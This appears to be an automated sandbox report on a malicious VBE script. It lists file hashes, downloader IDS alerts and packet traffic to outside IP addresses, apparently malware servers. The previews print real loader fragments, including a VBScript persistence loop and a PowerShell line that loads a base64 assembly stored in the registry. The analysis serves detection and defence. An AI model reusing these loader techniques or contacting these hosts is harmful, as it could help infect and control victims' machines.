                                                            SSDEEP:96:mjLlyt33CxH9hkvhkvCCtweI78H3eI7HHb:mjZcyd9weVeA
                                                            MD5:792AC76E1C8402DC4F63248BD1CA20A2
                                                            SHA1:3570CA2FB92312B16BD399F5C4B85397BBAD46F1
                                                            SHA-256:CD551C1CAAD95CBBE6D68E19AEFD77D5C2E4A84A53AFC71DA55EC123300E7A16
                                                            SHA-512:7BBAFF9323432051FECC4FD5745F5F0B235F55698E1E1F48D03B2BA656211B0B7FE96346E5D58831131438F52BB31077C8A078CEA737F06CA006250F8DAB1DA8
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ...-/.v......5..9..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....A la.9.......9......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^rY\e...........................%..A.p.p.D.a.t.a...B.V.1.....rYhe..Roaming.@......CW.^rYhe..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^rY`e..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................A.-.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^rY.e....Q...........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6221
                                                            Entropy (8bit):3.710479057510546
                                                            Encrypted:false
                                                            SSDEEP:96:mjLlyt33CxH9hkvhkvCCtweI78H3eI7HHb:mjZcyd9weVeA
                                                            MD5:792AC76E1C8402DC4F63248BD1CA20A2
                                                            SHA1:3570CA2FB92312B16BD399F5C4B85397BBAD46F1
                                                            SHA-256:CD551C1CAAD95CBBE6D68E19AEFD77D5C2E4A84A53AFC71DA55EC123300E7A16
                                                            SHA-512:7BBAFF9323432051FECC4FD5745F5F0B235F55698E1E1F48D03B2BA656211B0B7FE96346E5D58831131438F52BB31077C8A078CEA737F06CA006250F8DAB1DA8
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ...-/.v......5..9..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....A la.9.......9......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^rY\e...........................%..A.p.p.D.a.t.a...B.V.1.....rYhe..Roaming.@......CW.^rYhe..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^rY`e..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................A.-.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^rY.e....Q...........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6221
                                                            Entropy (8bit):3.710479057510546
                                                            Encrypted:false
                                                            SSDEEP:96:mjLlyt33CxH9hkvhkvCCtweI78H3eI7HHb:mjZcyd9weVeA
                                                            MD5:792AC76E1C8402DC4F63248BD1CA20A2
                                                            SHA1:3570CA2FB92312B16BD399F5C4B85397BBAD46F1
                                                            SHA-256:CD551C1CAAD95CBBE6D68E19AEFD77D5C2E4A84A53AFC71DA55EC123300E7A16
                                                            SHA-512:7BBAFF9323432051FECC4FD5745F5F0B235F55698E1E1F48D03B2BA656211B0B7FE96346E5D58831131438F52BB31077C8A078CEA737F06CA006250F8DAB1DA8
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ...-/.v......5..9..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....A la.9.......9......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^rY\e...........................%..A.p.p.D.a.t.a...B.V.1.....rYhe..Roaming.@......CW.^rYhe..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^rY`e..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................A.-.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^rY.e....Q...........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6221
                                                            Entropy (8bit):3.706719549561189
                                                            Encrypted:false
                                                            SSDEEP:96:+LlMtZ3CXq9hkvhkvCCtweI7HH3eI7HHb:+Z+Wy9weueA
                                                            MD5:4DCDD2AADF3BE4263F3EC1637168B442
                                                            SHA1:257A558C1477271EBEF294CE2707D60C0C79CE6A
                                                            SHA-256:5915EF158BC0D0039894FF598CF65376D168E18B2B5820A6E23B2AEFD674E0B7
                                                            SHA-512:2BEC1EB935A69E9C668836E15421A92031084E9D2DE31B4A52B21C959FC2F5B2F849CB9695F6CD1D9B9358A207A8FC3E686EE41B076D5F54E46864E93CE6947D
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ...-/.v......5..9..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....A la.9...I..9......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^rY\e...........................%..A.p.p.D.a.t.a...B.V.1.....rYhe..Roaming.@......CW.^rYhe..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^rY`e..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^rY.e..........................A.-.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^rY.e....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^rY.e....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^rY.e..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^rY.e....Q...........
                                                            Process:C:\Windows\System32\wscript.exe
                                                            File Type:ISO-8859 text
                                                            Category:dropped
                                                            Size (bytes):2012
                                                            Entropy (8bit):5.1116490090109
                                                            Encrypted:false
                                                            SSDEEP:48:9+rGQafYxl6hzjj0BWIudnXt9gVOSQngjHVVIdojnWgCmgVF:9+Sn7x/0MVYVOZg78dknQmgVF
                                                            MD5:0DCB03776DA0B1EC5F4418221CD9152E
                                                            SHA1:1D32D1E386C46FA6DBA8522C2A99C3FF272B6CDA
                                                            SHA-256:63373B65D80F24467F6D2FC10F33965BD40450F45068FDF7293928F52DD3DC20
                                                            SHA-512:325B25EACB4E06A40605ECDCF99BD96B39CFCBA9FAB430C855E953B4630A54FBE611D2365E1F7F71785FD65E9CD2ABA247287EDD3F0FED37A667169A906DC64B
                                                            Malicious:false
                                                            Preview:Option Explicit..' Nombre del proyecto: pcPseOUmXnpEaeF.' Variables globales.Dim ABC, DEF, GHI.Set ABC = CreateObject("WScript.Shell").DEF = ABC.ExpandEnvironmentStrings("%windir%")..' Programa principal.Call JKL().Call MNO()..' Inicializaci.n de los par.metros del programa.Sub JKL(). GHI = 0.End Sub..' Rutina principal para gestionar la ejecuci.n del programa.Sub MNO(). Do While GHI < 10000 ' L.mite de iteraciones para demostraci.n. PQR(). WScript.Sleep 10000. GHI = GHI + 1. Loop.End Sub..' Procedimiento para verificar e iniciar PowerShell si es necesario.Sub PQR(). If Not STU(ABC.RegRead("HKEY_CURRENT_USER\Software\pcPseOUmXnpEaeF\i")) Then. VWX(). . Dim YZA. Set YZA = BCD(). . If Not YZA Is Nothing Then. EFG(YZA). End If. End If.End Sub..' Funci.n para verificar si un proceso espec.fico est. en ejecuci.n.Function STU(NOP). Dim HIJ, KLM. Set HIJ = GetObject("winmgmts:\\.\root\cimv2")
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Non-ISO extended-ASCII text, with very long lines (875), with CRLF line terminators, with escape sequences
                                                            Category:dropped
                                                            Size (bytes):1494
                                                            Entropy (8bit):4.423978372785347
                                                            Encrypted:false
                                                            SSDEEP:24:Ei/tvNa2V269+IzphSjeKm3uSmcHqgxOAX4WLeX4WgeX4WgeX4WneX4WueX4WEef:EdWxZzpsyXOAX+X5XpXKX/XFXoXQXDX5
                                                            MD5:5C12740F85D91A751DF931A739F19CC5
                                                            SHA1:E03884BE6FD309C9E2260CC409D3BE3EF2F9102E
                                                            SHA-256:98A7E86A2614FE6B99A9D24A1DBA751BE3F177947AE0F5165F5888F665F2297B
                                                            SHA-512:40507BDD361FCA4104632CAA40A1A1400D4902F2FBA470160EF25B649E0D00489A04A34E71191B77F86D138196DBEC5382D961952A15857B0ED5F33CB41AF058
                                                            Malicious:false
                                                            Preview:.[91m> .[0m.[93m[.[33m.[45m.[0m.[33m.[45m> .[0m.[33m[.[37mAppDomain.[33m]::.[97mCu.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\pcPseOUmXnpEaeF'.[33m.[45m .[90m-Name.[33m.[45m .[36m's'.[33m)..[97ms.[33m.[45m .[33m|.[33m.[45m .[93mForEach-Object.[33m.[45m .[33m{.[92m$_.[33m[.[97m-1.[90m..-.[33m(.[92m$_.[33m..[97mLength.[33m)]})));.[33m.[45m .[33m[.[37mb.b.[33m]::.[97mb.[33m(.[36m'pcPseOUmXnpEaeF'.[33m).[33m.[45m.[0m.tape 1 ..etape 2...[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconho.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhos.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m .[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m .
                                                            File type:data
                                                            Entropy (8bit):3.873141167934975
                                                            TrID:
                                                            • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                            • MP3 audio (1001/1) 32.22%
                                                            • Lumena CEL bitmap (63/63) 2.03%
                                                            • Corel Photo Paint (41/41) 1.32%
                                                            File name:Ref#150062.vbe
                                                            File size:10'108 bytes
                                                            MD5:2874840f439a79083be1cb832dbd10f4
                                                            SHA1:e121f6fd96b75bc492c4a463c9d03d273d658f1b
                                                            SHA256:491e3f2d6ee7add3f362046c59a5ff7f8a292119b762d2b1f3174a283d41393d
                                                            SHA512:4fe2bfa046ca55e2adc4c179277ae7df351d398e3ea8e8b23d51531d9d403c8e4a471e4cb0d0fbd7b05319874190ac6455666510229562042bd112d7ddb4d65a
                                                            SSDEEP:192:nP0x+IjcaP76sgeumS8ZHSuWBDlpOxGRMVeLF+k8HZK:8oyn6sg5mNZHSxBhp4GRYk8A
                                                            TLSH:24220244CDD980D0F32566C60BCDD7E25B2FAA302B0F49D31E509296276FAC1E92AF35
                                                            File Content Preview:..#.@.~.^.p.B.M.A.A.A.=.=.v.,.1.G.s.P.9.E.P.a.D.K.%.+.D.P.l.P.a.m.K.d...r.j.s.p.x.a.2.l...o.@.#.@.&.@.#.@.&.}.w.O.k.G.U.,.2.a.w.^.r.m.b.Y.@.#.@.&.@.#.@.&.B.~.R. .O.~.s.K.U.1.Y.r.K.x.k.P.N...P.1.G.x.7.+.../.b.W.U.~._.2.(.,.n.Y.,.:.l...r.2.E.^.l.D.k.G.x.~.[
                                                            Icon Hash:68d69b8f86ab9a86
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-11-18T13:44:23.322025+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449883193.122.6.16880TCP
                                                            2024-11-18T13:44:30.337620+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449883193.122.6.16880TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 18, 2024 13:42:58.903248072 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:42:58.908376932 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:58.911272049 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:42:58.911454916 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:42:58.916407108 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.776099920 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.776120901 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.776137114 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.776150942 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.776161909 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.776177883 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.776192904 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.776299000 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:42:59.776303053 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.776315928 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.776333094 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.776354074 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:42:59.776379108 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:42:59.781297922 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.781353951 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.781418085 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:42:59.895407915 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.895426035 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.895442963 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.895466089 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.895479918 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.895493984 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.895503998 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:42:59.895508051 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.895541906 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:42:59.895567894 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:42:59.896430969 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.896481991 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.896485090 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:42:59.896496058 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.896533966 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:42:59.896603107 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.896615982 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:42:59.896667004 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.099411011 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.104454041 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.351298094 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.351362944 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.351507902 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.351706028 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.351780891 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.351794958 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.351828098 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.351918936 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.351932049 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.351968050 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.352190018 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.352242947 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.352262020 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.352274895 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.352317095 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.352447987 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.352461100 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.352498055 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.353164911 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.400121927 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.470808029 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.470833063 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.470848083 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.470895052 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.470906019 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.470938921 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.470952988 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.470952988 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.470993042 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.471358061 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.471419096 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.471431017 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.471479893 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.471493006 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.471507072 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.471549034 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.472254038 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.472294092 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.472306967 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.472307920 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.472342968 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.472348928 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.525084019 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.589665890 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.589684010 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.589695930 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.589709044 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.589798927 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.589842081 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.589860916 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.589905024 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.589914083 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.589940071 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.590173006 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.590217113 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.590250969 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.590301991 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.590342999 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.590358973 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.634468079 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.661837101 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.666838884 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.914413929 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.914437056 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.914458036 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.914470911 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.914484978 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.914541960 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.914613962 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.914697886 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.914757967 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.914906025 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.914921045 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.914968014 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.915088892 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.915136099 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.915148973 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.915179968 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.915184975 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.915239096 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.915664911 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.915714025 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.915728092 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.915769100 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:00.915770054 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:00.915822983 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.033185005 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.033210993 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.033222914 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.033279896 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.033466101 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.033477068 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.033489943 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.033500910 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.033513069 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.033678055 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.033678055 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.033931017 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.033941984 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.033987999 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.034075022 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.034130096 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.034142971 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.034179926 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.034218073 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.034235954 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.034250021 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.034272909 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.034301043 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.152133942 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.152163982 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.152178049 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.152245998 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.152260065 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.152292967 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.152312040 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.152324915 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.152364016 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.152482986 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.152775049 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.152817965 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.152829885 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.152844906 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.152883053 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.152898073 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.153175116 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.153199911 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.153212070 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.153214931 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.153247118 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.153379917 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.153394938 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.153434038 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.153789997 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.153903961 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.153951883 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.272614956 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.272701979 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.272751093 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.272763014 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.272805929 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.272844076 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.272855043 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.272898912 CET8049730144.91.79.54192.168.2.4
